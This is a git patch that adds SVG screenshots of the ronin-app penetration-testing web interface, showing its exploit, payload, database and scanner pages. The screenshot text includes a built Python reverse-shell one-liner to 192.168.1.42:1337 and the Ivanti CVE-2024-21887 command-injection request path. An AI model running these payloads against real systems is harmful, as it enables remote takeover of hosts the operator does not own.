From 03b4e1cb8269aa3abe6fbf81b1a52fc9140fc151 Mon Sep 17 00:00:00 2001 From: Postmodern Date: Fri, 14 Jun 2024 18:32:59 -0700 Subject: [PATCH] Attempt to add screenshots of the app (issue #4). --- README.md | 66 ++ screenshots/ronin_app_db.svg | 495 +++++++++++ screenshots/ronin_app_db_ip_address.svg | 461 ++++++++++ screenshots/ronin_app_exploits.svg | 249 ++++++ screenshots/ronin_app_exploits_show.svg | 650 ++++++++++++++ screenshots/ronin_app_payloads.svg | 442 ++++++++++ screenshots/ronin_app_payloads_build.svg | 413 +++++++++ screenshots/ronin_app_payloads_show.svg | 483 +++++++++++ screenshots/ronin_app_repos.svg | 260 ++++++ screenshots/ronin_app_repos_show.svg | 367 ++++++++ screenshots/ronin_app_scanning_masscan.svg | 617 ++++++++++++++ screenshots/ronin_app_scanning_nmap.svg | 936 +++++++++++++++++++++ screenshots/ronin_app_scanning_recon.svg | 278 ++++++ screenshots/ronin_app_scanning_spider.svg | 517 ++++++++++++ screenshots/ronin_app_scanning_vulns.svg | 476 +++++++++++ 15 files changed, 6710 insertions(+) create mode 100644 screenshots/ronin_app_db.svg create mode 100644 screenshots/ronin_app_db_ip_address.svg create mode 100644 screenshots/ronin_app_exploits.svg create mode 100644 screenshots/ronin_app_exploits_show.svg create mode 100644 screenshots/ronin_app_payloads.svg create mode 100644 screenshots/ronin_app_payloads_build.svg create mode 100644 screenshots/ronin_app_payloads_show.svg create mode 100644 screenshots/ronin_app_repos.svg create mode 100644 screenshots/ronin_app_repos_show.svg create mode 100644 screenshots/ronin_app_scanning_masscan.svg create mode 100644 screenshots/ronin_app_scanning_nmap.svg create mode 100644 screenshots/ronin_app_scanning_recon.svg create mode 100644 screenshots/ronin_app_scanning_spider.svg create mode 100644 screenshots/ronin_app_scanning_vulns.svg diff --git a/README.md b/README.md index 0b7604b..a1d7e36 100644 --- a/README.md +++ b/README.md @@ -25,6 +25,72 @@ user. It provides a web interface to [ronin-support], [ronin-repos], [ronin-db], * Small memory footprint (~184K). * Fast (~1.251ms response time). +## Screenshots + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + +
+ + + + + + + + + + + + + +
+ ## Synopsis ``` diff --git a/screenshots/ronin_app_db.svg b/screenshots/ronin_app_db.svg new file mode 100644 index 0000000..51a8bb5 --- /dev/null +++ b/screenshots/ronin_app_db.svg @@ -0,0 +1,495 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + Database + + + + + + + + + + + Host Names (2) + + + + + + + + + + + + ASNs (0) + + + + + + + + + + + + IP Addresses (2) + + + + + + + + + + + + MAC Addresses (0) + + + + + + + + + + + + + + Open Ports (6) + + + + + + + + + + + + Ports (5) + + + + + + + + + + + + Services (5) + + + + + + + + + + + + Vulnerabilities (0) + + + + + + + + + + + + + + URLs (0) + + + + + + + + + + + + URL Schemes (0) + + + + + + + + + + + + URL Query Param Names (0) + + + + + + + + + + + + + + Email Addresses (0) + + + + + + + + + + + + User Names (0) + + + + + + + + + + + + Passwords (0) + + + + + + + + + + + + Credentials (0) + + + + + + + + + + + + + + Advisories (0) + + + + + + + + + + + + Software (0) + + + + + + + + + + + + Software Vendors (0) + + + + + + + + + + + + OSes (0) + + + + + + + + + + + + + + Phone Numbers (0) + + + + + + + + + + + + Street Addresses (0) + + + + + + + + + + + + Organizations (0) + + + + + + + + + + + + People (0) + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_db_ip_address.svg b/screenshots/ronin_app_db_ip_address.svg new file mode 100644 index 0000000..12e6c32 --- /dev/null +++ b/screenshots/ronin_app_db_ip_address.svg @@ -0,0 +1,461 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + + + Home + + + + + + + / + + + + + Database + + + + + + + / + + + + + IP Addresses + + + + + + + + + + IP Address: 45.33.32.156 + + + + + + + + + + Delete + + + + + + + + + + + + + + + + + Address: + + + + + + + + + 45.33.32.156 + + + + + + + + + + + ASN: + + + + + + + + + + + + + + + + + Host Names: + + + + + + + + + + + scanme.nmap.org + + + + + + + + + + + + + Open Ports: + + + + + + + + + + + 45.33.32.156 22/tcp (ssh) + + + + + + + 45.33.32.156 80/tcp (http) + + + + + + + 45.33.32.156 9929/tcp (nping-echo) + + + + + + + 45.33.32.156 31337/tcp (Elite) + + + + + + + + + + + + + MAC Addresses: + + + + + + + + + + + + + + + + + Advisories: + + + + + + + + + + + + + + + + + Created: + + + + + + + + + 2024-06-15 00:19:35 UTC + + + + + + + + Scanned: + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Add note + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_exploits.svg b/screenshots/ronin_app_exploits.svg new file mode 100644 index 0000000..f26e5d7 --- /dev/null +++ b/screenshots/ronin_app_exploits.svg @@ -0,0 +1,249 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + Exploits + + + + + + activemq/CVE-2023-46604 + + + + + + + d-link/CVE-2024-3273 + + + + + + + flowmon/CVE-2024-2389 + + + + + + + ivanti/CVE-2024-21887 + + + + + + + sophos/CVE-2023-1671 + + + + + + + CVE-2023-27350 + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_exploits_show.svg b/screenshots/ronin_app_exploits_show.svg new file mode 100644 index 0000000..a279f33 --- /dev/null +++ b/screenshots/ronin_app_exploits_show.svg @@ -0,0 +1,650 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + Exploit: ivanti/CVE-2024-21887 + + + + + + + + + + + + + + + Name: + + + + + + + + + + ivanti/CVE-2024-21887 + + + + + + + + + + + + Quality: + + + + + + + + + Untested + + + + + + + + + + + Release Date: + + + + + + + + + 2024-01-19 + + + + + + + + + + + Disclosure Date: + + + + + + + + + 2024-01-12 + + + + + + + + + + + Advisories: + + + + + + + + + + + + CVE-2024-21887 + + + + + + + + + + + + + + Software: + + + + + + + + + + + + + + + + + Software + Versions: + + + + + + + + + + + + + + + + + Authors: + + + + + + + + + + Postmodern ( + + + + postmodern.mod3@gmail.com + + + + ) + + + + + + + + + + + + + Summary: + + + + + + + + + Command injection in Ivanti Connect Secure and Policy Secure (9.x, 22.x) + + + + + + + + + + + Description: + + + + + + + + + + + + + + + + Ivanti Connect Secure and Invait Policy Secure versions 9.x and 22.x are +vulnerable to a command injection in the `/api/v1/license/keys-status/` +HTTP end-point. + + GET /api/v1/totp/user-backup-code/../../license/keys-status/;COMMAND + Content-Type: application/json + + + + + + + + + + + + + References: + + + + + + + + + + + https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti- + Policy-Secure-Gateways?language=en_US + + + + + + + https://github.com/zwxxb/CVE-2023-21887 + + + + + + + https://github.com/zwxxb/CVE-2023-21887/blob/main/3xp.py + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_payloads.svg b/screenshots/ronin_app_payloads.svg new file mode 100644 index 0000000..9fa121d --- /dev/null +++ b/screenshots/ronin_app_payloads.svg @@ -0,0 +1,442 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + Payloads + + + + + + cmd/awk/reverse_shell + + + + + + + cmd/bash/reverse_shell + + + + + + + cmd/lua/reverse_shell + + + + + + + cmd/node/reverse_shell + + + + + + + cmd/openssl/reverse_shell + + + + + + + cmd/perl/reverse_shell + + + + + + + cmd/php/reverse_shell + + + + + + + cmd/powershell/reverse_shell + + + + + + + cmd/python/reverse_shell + + + + + + + cmd/ruby/reverse_shell + + + + + + + java/reverse_shell + + + + + + + php/cmd_exec + + + + + + + shellcode/freebsd/x86/bind_shell + + + + + + + shellcode/freebsd/x86/exec_shell + + + + + + + shellcode/freebsd/x86/reverse_shell + + + + + + + shellcode/freebsd/x86_64/exec_shell + + + + + + + shellcode/linux/arm/bind_shell + + + + + + + shellcode/linux/arm/exec_shell + + + + + + + shellcode/linux/arm/reverse_shell + + + + + + + shellcode/linux/mips/bind_shell + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_payloads_build.svg b/screenshots/ronin_app_payloads_build.svg new file mode 100644 index 0000000..e824c3f --- /dev/null +++ b/screenshots/ronin_app_payloads_build.svg @@ -0,0 +1,413 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + + Build Payload: cmd/python/reverse_shell + + + + + + Params + + + + + + host + + + + + + + + + + + + 192.168.1.42 + + + + + + + + The host to connect back to + + + + + + + port + + + + + + + + + + + + 1337 + + + + + + + + The port to connect back to + + + + + + + + + + Build + + + + + + + Built Payload + + + + + + + + + + + + + + + + + Raw + + + + + + + Hex + + + + + + + C + + + + + + + Shell + + + + + + + PowerShell + + + + + + + XML + + + + + + + HTML + + + + + + + JavaScript + + + + + + + Ruby + + + + + + + + + + + + + + + python -c 'import socket,os,pty;s=socket.socket();s.connect(("192.168.1.42",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_payloads_show.svg b/screenshots/ronin_app_payloads_show.svg new file mode 100644 index 0000000..4b5caaa --- /dev/null +++ b/screenshots/ronin_app_payloads_show.svg @@ -0,0 +1,483 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + Payload: shellcode/linux/x86_64/reverse_shell + + + + + + + + + + + + + + + Name: + + + + + + + + + + shellcode/linux/x86_64/reverse_shell + + + + + + + + + + + + Authors: + + + + + + + + + + Russell Willis ( + + + + codinguy@gmail.com + + + + ) + + + + + + + + + + + + + Summary: + + + + + + + + + Linux x86-64 reverse shell shellcode + + + + + + + + + + + Description: + + + + + + + + + + + + + + + + Linux x86-64 shellcode that spawns a connect back reverse shell. + + + + + + + + + + + + References: + + + + + + + + + + + https://shell-storm.org/shellcode/files/shellcode-857.html + + + + + + + + + + Params: + + + + + + + + + + + + + Name + + + + + Type + + + + + Required + + + + + Default + + + + + Description + + + + + + + + + + assembler + + + + + + + String + + + + + + + Required + + + + + + + as + + + + + + The assmebler command to use + + + + + + + + host + + + + + + + String + + + + + + + Required + + + + + + + + + The host to connect back to + + + + + + + + port + + + + + + + Integer + + + + + + + Required + + + + + + + + + The port to connect back to + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_repos.svg b/screenshots/ronin_app_repos.svg new file mode 100644 index 0000000..6adfa31 --- /dev/null +++ b/screenshots/ronin_app_repos.svg @@ -0,0 +1,260 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + Repositories + + + + + + community-pocs + + + + + + + example-exploits + + + + + + + + + + + + Install + + + + + + + + + + + + Update + + + + + + + + + + + + + Purge + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_repos_show.svg b/screenshots/ronin_app_repos_show.svg new file mode 100644 index 0000000..3e4e4c1 --- /dev/null +++ b/screenshots/ronin_app_repos_show.svg @@ -0,0 +1,367 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + Repository: community-pocs + + + + + + + + + + + + + + + Name: + + + + + + + + + community-pocs + + + + + + + + + + + URL: + + + + + + + + + https://github.com/ronin-rb/community-pocs.git + + + + + + + + Files: + + + + + + + CONTRIBUTING.md + + + + + COPYING.txt + + + + + README.md + + + + + SECURITY.md + + + + + exploits/activemq/CVE-2023-46604.rb + + + + + exploits/d-link/CVE-2024-3273.rb + + + + + exploits/flowmon/CVE-2024-2389.rb + + + + + exploits/ivanti/CVE-2024-21887.rb + + + + + exploits/sophos/CVE-2023-1671.rb + + + + + spec/exploits/d-link/CVE-2024-3273_spec.rb + + + + + spec/exploits/exploit_examples.rb + + + + + spec/exploits/flowmon/CVE-2024-2389_spec.rb + + + + + spec/exploits/ivanti/CVE-2024-21887_spec.rb + + + + + spec/exploits/sophos/CVE-2023-1671_spec.rb + + + + + spec/spec_helper.rb + + + + + + + + + + + + + + + Update + + + + + + + + + + + + + Remove + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_scanning_masscan.svg b/screenshots/ronin_app_scanning_masscan.svg new file mode 100644 index 0000000..5462c6d --- /dev/null +++ b/screenshots/ronin_app_scanning_masscan.svg @@ -0,0 +1,617 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + + masscan + + + + + + + Targets + + + + * + + + + + + + + + + + + + 192.168.1.1/24 + + + + + + + + + + Ports + + + + * + + + + + + + + + + + + + 22,80,443,8000-9000 + + + + + + + + + + + + + Scan + + + + + + + + + + + + + + + General + + + + + + + + + + Timing + + + + + + + + + + Routing + + + + + + + + + + Exclude/Include + + + + + + + + + + Payload File + + + + + + + + + + HTTP + + + + + + + + + + Logging + + + + + + + + + + Tuning + + + + + + + + + + Randomization + + + + + + + + + + + Ping: + + + + + + + + + + + + on + + + + + + + + + Banners: + + + + + + + + + + + + on + + + + + + + + + Config File: + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_scanning_nmap.svg b/screenshots/ronin_app_scanning_nmap.svg new file mode 100644 index 0000000..f22b034 --- /dev/null +++ b/screenshots/ronin_app_scanning_nmap.svg @@ -0,0 +1,936 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + + nmap + + + + + + + Targets + + + + * + + + + + + + + + + + + + + + + + + + + + Ports + + + + + + + + + + + + + + + + + + + + + + + Scan + + + + + + + + + + + + + + + Target + + + + + + + + + + Host Discovery + + + + + + + + + + Port Scanning + + + + + + + + + + Scan Order + + + + + + + + + + Service Scan + + + + + + + + + + OS Detection + + + + + + + + + + Timing and Performance + + + + + + + + + + Evasion and Spoofing + + + + + + + + + + Misc + + + + + + + + + + + Target File + + + + + + + + + + + + + + + + + + + + Random Targets + + + + + + + + + + + + + + + + + + + + Exclude Targets + + + + + + + + + + + + + + + + + + + + Exclude File + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_scanning_recon.svg b/screenshots/ronin_app_scanning_recon.svg new file mode 100644 index 0000000..2f8e079 --- /dev/null +++ b/screenshots/ronin_app_scanning_recon.svg @@ -0,0 +1,278 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + Recon + + + + + + + Scope + + + + * + + + + + + + + + + + + + + + + + + Ignore + + + + + + + + + + + + + + + + + + + + Recon + + + + + + + Max Depth + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_scanning_spider.svg b/screenshots/ronin_app_scanning_spider.svg new file mode 100644 index 0000000..7b33e8b --- /dev/null +++ b/screenshots/ronin_app_scanning_spider.svg @@ -0,0 +1,517 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + + Spider + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + example.com + + + + + + + * + + + + + + + + + + + Spider + + + + + + + + + + + + + + + General + + + + + + + + + + Header + + + + + + + + + + Timeout + + + + + + + + + + Limit + + + + + + + + + + URI Normalization + + + + + + + + + + Allow/Ignore + + + + + + + + + + + + + + + + + + + + + + + + + Host Header: + + + + + + + + + + + + + + + + + + + + User-Agent Header: + + + + + + + + + + + + + + + + + + + + Referer Header: + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/screenshots/ronin_app_scanning_vulns.svg b/screenshots/ronin_app_scanning_vulns.svg new file mode 100644 index 0000000..7b732e0 --- /dev/null +++ b/screenshots/ronin_app_scanning_vulns.svg @@ -0,0 +1,476 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Sidekiq Dashboard + + + + + + + + + + GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + home + + + + + repos + + + + + payloads + + + + + exploits + + + + + database + + + + + import + + + + + + + + + + + + + + + scanning + + + + + + queue + + + + + about + + + + + + + + + + + + + + Vulnerabilities + + + + + + + URL + + + + * + + + + + + + + + + + + + http://testphp.vulnweb.com/listproducts.php?cat=1 + + + + + + + + + + + + + Scan + + + + + + + + + + + + + + + LFI + + + + + + + + + + RFI + + + + + + + + + + SQLI + + + + + + + + + + SSTI + + + + + + + + + + Command Injection + + + + + + + + + + Open Redirect + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Escape Quote: + + + + + + + + + on + + + + + + + + + Escape Parens: + + + + + + + + + on + + + + + + + + + Terminate: + + + + + + + + + on + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file